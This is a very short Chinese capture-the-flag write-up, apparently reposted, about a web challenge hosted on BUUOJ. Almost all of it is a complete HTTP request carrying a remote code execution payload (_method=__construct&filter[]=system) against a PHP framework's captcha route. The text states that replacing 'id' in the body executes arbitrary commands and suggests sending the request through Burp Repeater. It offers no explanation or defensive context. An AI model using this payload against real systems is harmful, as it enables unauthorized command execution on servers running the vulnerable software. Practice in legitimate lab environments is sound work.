本文共 500 字,大约阅读时间需要 1 分钟。
http://node3.buuoj.cn:27512/
直接用poc打一下:
POST /index.php?s=captcha HTTP/1.1Host: node3.buuoj.cn:27512Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 72_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
直接在burp的repeater模块里面构造就行了:
这里直接修改id即可,id处可以执行任意代码。
转载地址:http://hapbi.baihongyu.com/